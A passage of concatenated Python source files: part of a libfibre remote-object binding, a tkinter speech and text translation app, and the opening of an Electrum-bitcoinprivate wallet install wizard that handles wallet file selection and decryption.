codec_name = codec_names[i].decode('utf-8')
if not codec_name in codecs:
raise Exception("unsupported codec {}".format(codec_name))
yield arg_name, codec_name, codecs[codec_name]
def insert_with_new_id(dictionary, val):
key = next(x for x in count(1) if x not in set(dictionary.keys()))
dictionary[key] = val
return key
# Runs a function on a foreign event loop and blocks until the function is done.
def run_coroutine_threadsafe(loop, func):
future = concurrent.futures.Future()
async def func_async():
try:
result = func()
if hasattr(result, '__await__'):
result = await result
future.set_result(result)
except Exception as ex:
future.set_exception(ex)
loop.call_soon_threadsafe(asyncio.ensure_future, func_async())
return future.result()
class TxStream():
"""Python wrapper for libfibre's LibFibreTxStream interface"""
def __init__(self, libfibre, tx_stream_handle):
self._libfibre = libfibre
self._tx_stream_handle = tx_stream_handle
self._future = None
self._tx_buf = None
self._c_on_tx_completed = OnTxCompletedSignature(self._on_tx_completed)
self.is_closed = False
def _on_tx_completed(self, ctx, tx_stream, status, tx_end):
tx_start = cast(self._tx_buf, c_void_p).value
n_written = tx_end - tx_start
assert(n_written <= len(self._tx_buf))
future = self._future
self._future = None
self._tx_buf = None
if status == kFibreClosed:
self.is_closed = True
if status == kFibreOk or status == kFibreClosed:
future.set_result(n_written)
else:
future.set_exception(_get_exception(status))
def write(self, data):
"""
Writes the provided data to the stream. Not all bytes are guaranteed to
be written. The caller should check the return value to determine the
actual number of bytes written.
If a non-empty buffer is provided, this function will either write at
least one byte to the output, set is_closed to True or throw an
Exception (through the future).
Currently only one write call may be active at a time (this may change
in the future).
Returns: A future that completes with the number of bytes actually
written or an Exception.
"""
assert(self._future is None)
self._future = future = self._libfibre.loop.create_future()
self._tx_buf = data # Retain a reference to the buffer to prevent it from being garbage collected
libfibre_start_tx(self._tx_stream_handle,
cast(self._tx_buf, c_char_p), len(self._tx_buf),
self._c_on_tx_completed, None)
return future
async def write_all(self, data):
"""
Writes all of the provided data to the stream or completes with an
Exception.
If an empty buffer is provided, the underlying stream's write function
is still called at least once.
Returns: A future that either completes with an empty result or with
an Exception.
"""
while True:
n_written = await self.write(data)
data = data[n_written:]
if len(data) == 0:
break
elif self.is_closed:
raise EOFError("the TX stream was closed but there are still {} bytes left to send".format(len(data)))
assert(n_written > 0) # Ensure progress
class RxStream():
"""Python wrapper for libfibre's LibFibreRxStream interface"""
def __init__(self, libfibre, rx_stream_handle):
self._libfibre = libfibre
self._rx_stream_handle = rx_stream_handle
self._future = None
self._rx_buf = None
self._c_on_rx_completed = OnRxCompletedSignature(self._on_rx_completed)
self.is_closed = False
def _on_rx_completed(self, ctx, rx_stream, status, rx_end):
rx_start = cast(self._rx_buf, c_void_p).value
n_read = rx_end - rx_start
assert(n_read <= len(self._rx_buf))
data = self._rx_buf[:n_read]
future = self._future
self._future = None
self._rx_buf = None
if status == kFibreClosed:
self.is_closed = True
if status == kFibreOk or status == kFibreClosed:
future.set_result(data)
else:
future.set_exception(_get_exception(status))
def read(self, n_read):
"""
Reads up to the specified number of bytes from the stream.
If more than zero bytes are requested, this function will either read at
least one byte, set is_closed to True or throw an Exception (through the
future).
Currently only one write call may be active at a time (this may change
in the future).
Returns: A future that either completes with a buffer containing the
bytes that were read or completes with an Exception.
"""
assert(self._future is None)
self._future = future = self._libfibre.loop.create_future()
self._rx_buf = bytes(n_read)
libfibre_start_rx(self._rx_stream_handle,
cast(self._rx_buf, c_char_p), len(self._rx_buf),
self._c_on_rx_completed, None)
return future
async def read_all(self, n_read):
"""
Reads the specified number of bytes from the stream or throws an
Exception.
If zero bytes are requested, the underlying stream's read function
is still called at least once.
Returns: A future that either completes with a buffer of size n_read or
an Exception.
"""
data = bytes()
while True:
chunk = await self.read(n_read - len(data))
data += chunk
if n_read == len(data):
break
elif self.is_closed:
raise EOFError()
assert(len(chunk) > 0) # Ensure progress
return data
class Call(object):
"""
This call behaves as you would expect an async generator to behave. This is
used to provide compatibility down to Python 3.5.
"""
def __init__(self, func):
self._func = func
self._call_handle = c_void_p(0)
self._is_started = False
self._should_close = False
self._is_closed = False
self._tx_buf = None
def __aiter__(self):
return self
async def asend(self, val):
assert(self._is_started == (not val is None))
if not val is None:
self._tx_buf, self._rx_len, self._should_close = val
return await self.__anext__()
async def __anext__(self):
if not self._is_started:
self._is_started = True
return None # This immitates the weird starting behavior of Python 3.6+ async generators iterators
if self._is_closed:
raise StopAsyncIteration
tx_end = c_void_p(0)
rx_end = c_void_p(0)
rx_buf = b'\0' * self._rx_len
call_id = insert_with_new_id(self._func._libfibre._calls, self)
status = libfibre_call(self._func._func_handle, byref(self._call_handle),
kFibreClosed if self._should_close else kFibreOk,
cast(self._tx_buf, c_char_p), len(self._tx_buf),
cast(rx_buf, c_char_p), len(rx_buf),
byref(tx_end), byref(rx_end), self._func._libfibre.c_on_call_completed, call_id)
if status == kFibreBusy:
self.ag_await = self._func._libfibre.loop.create_future()
status, tx_end, rx_end = await self.ag_await
self.ag_await = None
if status != kFibreOk and status != kFibreClosed:
raise _get_exception(status)
n_written = tx_end - cast(self._tx_buf, c_void_p).value
self._tx_buf = self._tx_buf[n_written:]
n_read = rx_end - cast(rx_buf, c_void_p).value
rx_buf = rx_buf[:n_read]
if status != kFibreOk:
self._is_closed = True
return self._tx_buf, rx_buf, self._is_closed
async def cancel():
# TODO: this doesn't follow the official Python async generator protocol. Should implement aclose() instead.
status = libfibre_call(self._func._func_handle, byref(self._call_handle), kFibreOk,
0, 0, 0, 0, 0, 0, self._func._libfibre.c_on_call_completed, call_id)
#async def aclose(self):
# assert(self._is_started and not self._is_closed)
# return self._tx_buf, rx_buf, self._is_closed
class RemoteFunction(object):
"""
Represents a callable function that maps to a function call on a remote object.
"""
def __init__(self, libfibre, func_handle, inputs, outputs):
self._libfibre = libfibre
self._func_handle = func_handle
self._inputs = inputs
self._outputs = outputs
self._rx_size = sum(codec.get_length() for _, _, codec in self._outputs)
async def async_call(self, args, cancellation_token):
#print("making call on " + hex(args[0]._obj_handle))
tx_buf = bytes()
for i, arg in enumerate(self._inputs):
tx_buf += arg[2].serialize(self._libfibre, args[i])
rx_buf = bytes()
agen = Call(self)
if not cancellation_token is None:
cancellation_token.add_done_callback(agen.cancel)
try:
assert(await agen.asend(None) is None)
is_closed = False
while not is_closed:
tx_buf, rx_chunk, is_closed = await agen.asend((tx_buf, self._rx_size - len(rx_buf), True))
rx_buf += rx_chunk
finally:
if not cancellation_token is None:
cancellation_token.remove_done_callback(agen.cancel)
assert(len(rx_buf) == self._rx_size)
outputs = []
for arg in self._outputs:
arg_length = arg[2].get_length()
outputs.append(arg[2].deserialize(self._libfibre, rx_buf[:arg_length]))
rx_buf = rx_buf[arg_length:]
if len(outputs) == 0:
return
elif len(outputs) == 1:
return outputs[0]
else:
return tuple(outputs)
def __call__(self, *args, cancellation_token = None):
"""
Starts invoking the remote function. The first argument is usually a
remote object.
If this function is called from the Fibre thread then it is nonblocking
and returns an asyncio.Future. If it is called from another thread then
it blocks until the function completes and returns the result(s) of the
invokation.
"""
if threading.current_thread() != libfibre_thread:
return run_coroutine_threadsafe(self._libfibre.loop, lambda: self.__call__(*args))
if (len(self._inputs) != len(args)):
raise TypeError("expected {} arguments but have {}".format(len(self._inputs), len(args)))
coro = self.async_call(args, cancellation_token)
return asyncio.ensure_future(coro, loop=self._libfibre.loop)
def __get__(self, instance, owner):
return MethodType(self, instance) if instance else self
def _dump(self, name):
print_arglist = lambda arglist: ", ".join("{}: {}".format(arg_name, codec_name) for arg_name, codec_name, codec in arglist)
return "{}({}){}".format(name,
print_arglist(self._inputs),
"" if len(self._outputs) == 0 else
" -> " + print_arglist(self._outputs) if len(self._outputs) == 1 else
" -> (" + print_arglist(self._outputs) + ")")
class RemoteAttribute(object):
def __init__(self, libfibre, attr_handle, intf_handle, intf_name, magic_getter, magic_setter):
self._libfibre = libfibre
self._attr_handle = attr_handle
self._intf_handle = intf_handle
self._intf_name = intf_name
self._magic_getter = magic_getter
self._magic_setter = magic_setter
def _get_obj(self, instance):
assert(not instance._obj_handle is None)
obj_handle = c_void_p(0)
status = libfibre_get_attribute(instance._obj_handle, self._attr_handle, byref(obj_handle))
if status != kFibreOk:
raise _get_exception(status)
obj = self._libfibre._load_py_obj(obj_handle.value, self._intf_handle)
if obj in instance._children:
self._libfibre._release_py_obj(obj_handle.value)
else:
# the object will be released when the parent is released
instance._children.add(obj)
return obj
def __get__(self, instance, owner):
if not instance:
return self
if self._magic_getter:
if threading.current_thread() == libfibre_thread:
# read() behaves asynchronously when run on the fibre thread
# which means it returns an awaitable which _must_ be awaited
# (otherwise it's a bug). However hasattr(...) internally calls
# __get__ and does not await the result. Thus the safest thing
# is to just disallow __get__ from run as an async method.
raise Exception("Cannot use magic getter on Fibre thread. Use _[prop_name]_propery.read() instead.")
return self._get_obj(instance).read()
else:
return self._get_obj(instance)
def __set__(self, instance, val):
if self._magic_setter:
return self._get_obj(instance).exchange(val)
else:
raise Exception("this attribute cannot be written to")
class RemoteObject(object):
"""
Base class for interfaces of remote objects.
"""
__sealed__ = False
def __init__(self, libfibre, obj_handle):
self.__class__._refcount += 1
self._refcount = 0
self._children = set()
self._libfibre = libfibre
self._obj_handle = obj_handle
self._on_lost = concurrent.futures.Future() # TODO: maybe we can do this with conc
# Ensure that assignments to undefined attributes raise an exception
self.__sealed__ = True
def __setattr__(self, key, value):
if self.__sealed__ and not hasattr(self, key):
raise AttributeError("Attribute {} not found".format(key))
object.__setattr__(self, key, value)
#def __del__(self):
# print("unref")
# libfibre_unref_obj(self._obj_handle)
def _dump(self, indent, depth):
if self._obj_handle is None:
return "[object lost]"
try:
if depth <= 0:
return "..."
lines = []
for key in dir(self.__class__):
if key.startswith('_'):
continue
class_member = getattr(self.__class__, key)
if isinstance(class_member, RemoteFunction):
lines.append(indent + class_member._dump(key))
elif isinstance(class_member, RemoteAttribute):
val = getattr(self, key)
if isinstance(val, RemoteObject) and not class_member._magic_getter:
lines.append(indent + key + (": " if depth == 1 else ":\n") + val._dump(indent + " ", depth - 1))
else:
if isinstance(val, RemoteObject) and class_member._magic_getter:
val_str = get_user_name(val)
else:
val_str = str(val)
property_type = str(class_member._get_obj(self).__class__.read._outputs[0][1])
lines.append(indent + key + ": " + val_str + " (" + property_type + ")")
else:
lines.append(indent + key + ": " + str(type(val)))
except:
return "[failed to dump object]"
return "\n".join(lines)
def __str__(self):
return self._dump("", depth=2)
def __repr__(self):
return self.__str__()
def _destroy(self):
libfibre = self._libfibre
on_lost = self._on_lost
children = self._children
self._libfibre = None
self._obj_handle = None
self._on_lost = None
self._children = set()
for child in children:
libfibre._release_py_obj(child._obj_handle)
self.__class__._refcount -= 1
if self.__class__._refcount == 0:
libfibre.interfaces.pop(self.__class__._handle)
on_lost.set_result(True)
class LibFibre():
def __init__(self):
self.loop = asyncio.get_event_loop()
# We must keep a reference to these function objects so they don't get
# garbage collected.
self.c_post = PostSignature(self._post)
self.c_register_event = RegisterEventSignature(self._register_event)
self.c_deregister_event = DeregisterEventSignature(self._deregister_event)
self.c_call_later = CallLaterSignature(self._call_later)
self.c_cancel_timer = CancelTimerSignature(self._cancel_timer)
self.c_on_found_object = OnFoundObjectSignature(self._on_found_object)
self.c_on_lost_object = OnLostObjectSignature(self._on_lost_object)
self.c_on_discovery_stopped = OnStoppedSignature(self._on_discovery_stopped)
self.c_on_attribute_added = OnAttributeAddedSignature(self._on_attribute_added)
self.c_on_attribute_removed = OnAttributeRemovedSignature(self._on_attribute_removed)
self.c_on_function_added = OnFunctionAddedSignature(self._on_function_added)
self.c_on_function_removed = OnFunctionRemovedSignature(self._on_function_removed)
self.c_on_call_completed = OnCallCompletedSignature(self._on_call_completed)
self.timer_map = {}
self.eventfd_map = {}
self.interfaces = {} # key: libfibre handle, value: python class
self.discovery_processes = {} # key: ID, value: python dict
self._objects = {} # key: libfibre handle, value: python class
self._calls = {} # key: libfibre handle, value: Call object
event_loop = LibFibreEventLoop()
event_loop.post = self.c_post
event_loop.register_event = self.c_register_event
event_loop.deregister_event = self.c_deregister_event
event_loop.call_later = self.c_call_later
event_loop.cancel_timer = self.c_cancel_timer
self.ctx = c_void_p(libfibre_open(event_loop))
assert(self.ctx)
def _post(self, callback, ctx):
self.loop.call_soon_threadsafe(callback, ctx)
return 0
def _register_event(self, event_fd, events, callback, ctx):
self.eventfd_map[event_fd] = events
if (events & 1):
self.loop.add_reader(event_fd, lambda x: callback(x, 1), ctx)
if (events & 4):
self.loop.add_writer(event_fd, lambda x: callback(x, 4), ctx)
if (events & 0xfffffffa):
raise Exception("unsupported event mask " + str(events))
return 0
def _deregister_event(self, event_fd):
events = self.eventfd_map.pop(event_fd)
if (events & 1):
self.loop.remove_reader(event_fd)
if (events & 4):
self.loop.remove_writer(event_fd)
return 0
def _call_later(self, delay, callback, ctx):
timer_id = insert_with_new_id(self.timer_map, self.loop.call_later(delay, callback, ctx))
return timer_id
def _cancel_timer(self, timer_id):
self.timer_map.pop(timer_id).cancel()
return 0
def _load_py_intf(self, name, intf_handle):
"""
Creates a new python type for the specified libfibre interface handle or
returns the existing python type if one was already create before.
Behind the scenes the python type will react to future events coming
from libfibre, such as functions/attributes being added/removed.
"""
if intf_handle in self.interfaces:
return self.interfaces[intf_handle]
else:
if name is None:
name = "anonymous_interface_" + str(intf_handle)
py_intf = self.interfaces[intf_handle] = type(name, (RemoteObject,), {'_handle': intf_handle, '_refcount': 0})
#exit(1)
libfibre_subscribe_to_interface(intf_handle, self.c_on_attribute_added, self.c_on_attribute_removed, self.c_on_function_added, self.c_on_function_removed, intf_handle)
return py_intf
def _load_py_obj(self, obj_handle, intf_handle):
if not obj_handle in self._objects:
name = None # TODO: load from libfibre
py_intf = self._load_py_intf(name, intf_handle)
py_obj = py_intf(self, obj_handle)
self._objects[obj_handle] = py_obj
else:
py_obj = self._objects[obj_handle]
# Note: this refcount does not count the python references to the object
# but rather mirrors the libfibre-internal refcount of the object. This
# is so that we can destroy the Python object when libfibre releases it.
py_obj._refcount += 1
return py_obj
def _release_py_obj(self, obj_handle):
py_obj = self._objects[obj_handle]
py_obj._refcount -= 1
if py_obj._refcount <= 0:
self._objects.pop(obj_handle)
py_obj._destroy()
def _on_found_object(self, ctx, obj, intf):
py_obj = self._load_py_obj(obj, intf)
discovery = self.discovery_processes[ctx]
discovery._unannounced.append(py_obj)
old_future = discovery._future
discovery._future = self.loop.create_future()
old_future.set_result(None)
def _on_lost_object(self, ctx, obj):
self._release_py_obj(obj)
def _on_discovery_stopped(self, ctx, result):
print("discovery stopped")
def _on_attribute_added(self, ctx, attr, name, name_length, subintf, subintf_name, subintf_name_length):
name = string_at(name, name_length).decode('utf-8')
subintf_name = None if subintf_name is None else string_at(subintf_name, subintf_name_length).decode('utf-8')
intf = self.interfaces[ctx]
magic_getter = not subintf_name is None and subintf_name.startswith("fibre.Property<") and subintf_name.endswith(">")
magic_setter = not subintf_name is None and subintf_name.startswith("fibre.Property<readwrite ") and subintf_name.endswith(">")
setattr(intf, name, RemoteAttribute(self, attr, subintf, subintf_name, magic_getter, magic_setter))
if magic_getter or magic_setter:
setattr(intf, "_" + name + "_property", RemoteAttribute(self, attr, subintf, subintf_name, False, False))
def _on_attribute_removed(self, ctx, attr):
print("attribute removed") # TODO
def _on_function_added(self, ctx, func, name, name_length, input_names, input_codecs, output_names, output_codecs):
name = string_at(name, name_length).decode('utf-8')
inputs = list(decode_arg_list(input_names, input_codecs))
outputs = list(decode_arg_list(output_names, output_codecs))
intf = self.interfaces[ctx]
setattr(intf, name, RemoteFunction(self, func, inputs, outputs))
def _on_function_removed(self, ctx, func):
print("function removed") # TODO
def _on_call_completed(self, ctx, status, tx_end, rx_end, tx_buf, tx_len, rx_buf, rx_len):
call = self._calls.pop(ctx)
call.ag_await.set_result((status, tx_end, rx_end))
return kFibreBusy
class Discovery():
"""
All public members of this class are thread-safe.
"""
def __init__(self, domain):
self._domain = domain
self._id = 0
self._discovery_handle = c_void_p(0)
self._unannounced = []
self._future = domain._libfibre.loop.create_future()
async def _next(self):
if len(self._unannounced) == 0:
await self._future
return self._unannounced.pop(0)
def _stop(self):
self._domain._libfibre.discovery_processes.pop(self._id)
libfibre_stop_discovery(self._discovery_handle)
self._future.set_exception(asyncio.CancelledError())
def stop(self):
if threading.current_thread() == libfibre_thread:
self._stop()
else:
run_coroutine_threadsafe(self._domain._libfibre.loop, self._stop)
class _Domain():
"""
All public members of this class are thread-safe.
"""
def __init__(self, libfibre, handle):
self._libfibre = libfibre
self._domain_handle = handle
def _close(self):
libfibre_close_domain(self._domain_handle)
self._domain_handle = None
#decrement_lib_refcount()
def _start_discovery(self):
discovery = Discovery(self)
discovery._id = insert_with_new_id(self._libfibre.discovery_processes, discovery)
libfibre_start_discovery(self._domain_handle, byref(discovery._discovery_handle), self._libfibre.c_on_found_object, self._libfibre.c_on_lost_object, self._libfibre.c_on_discovery_stopped, discovery._id)
return discovery
async def _discover_one(self):
discovery = self._start_discovery()
obj = await discovery._next()
discovery._stop()
return obj
def discover_one(self):
"""
Blocks until exactly one object is discovered.
"""
return run_coroutine_threadsafe(self._libfibre.loop, self._discover_one)
def run_discovery(self, callback):
"""
Invokes `callback` for every object that is discovered. The callback is
invoked on the libfibre thread and can be an asynchronous function.
Returns a `Discovery` object on which `stop()` can be called to
terminate the discovery.
"""
discovery = run_coroutine_threadsafe(self._libfibre.loop, self._start_discovery)
async def loop():
while True:
obj = await discovery._next()
await callback(obj)
self._libfibre.loop.call_soon_threadsafe(lambda: asyncio.ensure_future(loop()))
return discovery
class Domain():
def __init__(self, path):
increment_lib_refcount()
self._opened_domain = run_coroutine_threadsafe(libfibre.loop, lambda: Domain._open(path))
def _open(path):
assert(libfibre_thread == threading.current_thread())
buf = path.encode('ascii')
domain_handle = libfibre_open_domain(libfibre.ctx, buf, len(buf))
return _Domain(libfibre, domain_handle)
def __enter__(self):
return self._opened_domain
def __exit__(self, type, value, traceback):
run_coroutine_threadsafe(self._opened_domain._libfibre.loop, self._opened_domain._close)
self._opened_domain = None
decrement_lib_refcount()
libfibre = None
def _run_event_loop():
global libfibre
global terminate_libfibre
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
terminate_libfibre = loop.create_future()
libfibre = LibFibre()
libfibre.loop.run_until_complete(terminate_libfibre)
libfibre_close(libfibre.ctx)
# Detach all objects that still exist
# TODO: the proper way would be either of these
# - provide a libfibre function to destroy an object on-demand which we'd
# call before libfibre_close().
# - have libfibre_close() report the destruction of all objects
while len(libfibre._objects):
libfibre._objects.pop(list(libfibre._objects.keys())[0])._destroy()
assert(len(libfibre.interfaces) == 0)
libfibre = None
lock = threading.Lock()
libfibre_refcount = 0
libfibre_thread = None
def increment_lib_refcount():
global libfibre_refcount
global libfibre_thread
with lock:
libfibre_refcount += 1
#print("inc refcount to {}".format(libfibre_refcount))
if libfibre_refcount == 1:
libfibre_thread = threading.Thread(target = _run_event_loop)
libfibre_thread.start()
while libfibre is None:
time.sleep(0.1)
def decrement_lib_refcount():
global libfibre_refcount
global libfibre_thread
with lock:
#print("dec refcount from {}".format(libfibre_refcount))
libfibre_refcount -= 1
if libfibre_refcount == 0:
libfibre.loop.call_soon_threadsafe(lambda: terminate_libfibre.set_result(True))
# It's unlikely that releasing fibre from a fibre callback is ok. If
# there is a valid scenario for this then we can remove the assert.
assert(libfibre_thread != threading.current_thread())
libfibre_thread.join()
libfibre_thread = None
def get_user_name(obj):
"""
Can be overridden by the application to return the user-facing name of an
object.
"""
return "[anonymous object]"
|
translate.py | from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import languages
import threading
import pathlib
import speechTranslate as st
import textToSpeech as tts
import imageInterpreter as ii
# Translates input audio into English
def speechtranslate():
try:
targetLang = langVariable.get()
translatedText = st.recordAudio(targetLang)
textBox.insert(1.0, translatedText)
translatebutton.config(text="Translate")
except:
translatebutton.config(text="Translate")
# Translates text into desired language
def texttranslate():
input = textBox.get("1.0",END)
lang = langVariable.get()
result=st.translate(input,lang)
textBox.delete('1.0', END)
textBox.insert(1.0, result)
# Calls the speechtranslate while threading
def listen():
textBox.delete('1.0', END)
translatebutton.config(text="Listening...")
thread = threading.Thread(target=speechtranslate)
thread.start()
# Changes text to speech
def speak():
language = langVariable.get()
text = textBox.get("1.0",END)
if len(text) == 1:
text = st.translate("No text available",language)
print(type(text))
tts.playAudio(language,text)
# Calls translate function upon language change
def change(event):
input = textBox.get("1.0",END)
lang = langVariable.get()
result=st.translate(input,lang)
textBox.delete('1.0', END)
textBox.insert(1.0, result)
# upload image fuction
def UploadAction(event=None):
filename = filedialog.askopenfilename()
print('Selected:', filename)
result = ii.getTextFromImage(filename)
lang = langVariable.get()
result=st.translate(result,lang)
textBox.delete('1.0', END)
textBox.insert(1.0, result)
#path of current file
path = pathlib.Path(__file__).parent.absolute()
#App icon image
filename= str(path) + '/images/image.png'
#Window components
window = Tk()
window.iconphoto(False, PhotoImage(file=filename))
window.title("Speech Translate")
window.geometry('400x500')
window.configure(background = "#161d25")
window.resizable(False, False)
#Body Frame
frame = Frame(window,bg = "#161d25",width=400,height=500)
frame.grid(row=0,column=0,sticky="NW")
frame.grid_propagate(0)
frame.update()
OPTIONS = languages.getLanguages()
#Language Button
langVariable = StringVar(frame)
langVariable.set("english") # default value
languageOption = OptionMenu(frame, langVariable, *OPTIONS, command = change)
languageOption.place(x=200, y=20, anchor="center")
languageOption.config(bg = "#161d25",font=("Courier", 15),height = 10, width = 15)
#TextBox
textBox = Text(frame)
textBox.place(x=200, y=150, anchor="center")
textBox.config(font=("Courier", 15),height = 12,width = 40)
#Speech Translate Button
iconFile = str(path) + '/images/icon.png'
photo = PhotoImage(file = iconFile)
speechbutton = Button(frame, text="Speech Translate", image = photo , command=listen)
speechbutton.place(x=200, y=290, anchor="center")
speechbutton.config(fg = "#161d25",font=("Courier", 15),height = 50, width = 50)
#Text Translate Button
translatebutton = Button(frame, text="Translate", command=texttranslate)
translatebutton.place(x=120, y=350, anchor="center")
translatebutton.config(fg = "#161d25",font=("Courier", 15),height = 2, width = 16)
#Play Audio Button
Audiobutton = Button(frame, text="Play Audio", command=speak)
Audiobutton.place(x=280, y=350, anchor="center")
Audiobutton.config(fg = "#161d25",font=("Courier", 15),height = 2, width = 16)
#Upload Image Button
imageButton = Button(frame, text="Image Upload", command=UploadAction)
imageButton.place(x=200, y=420, anchor="center")
imageButton.config(fg = "#161d25",font=("Courier", 15),height = 2, width = 16)
window.mainloop() |
installwizard.py |
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_bitcoinprivate import Wallet, WalletStorage
from electrum_bitcoinprivate.util import UserCancelled, InvalidPassword
from electrum_bitcoinprivate.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum_bitcoinprivate.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
pass
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-bitcoinprivate - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-bitcoinprivate.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-bitcoinprivate wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
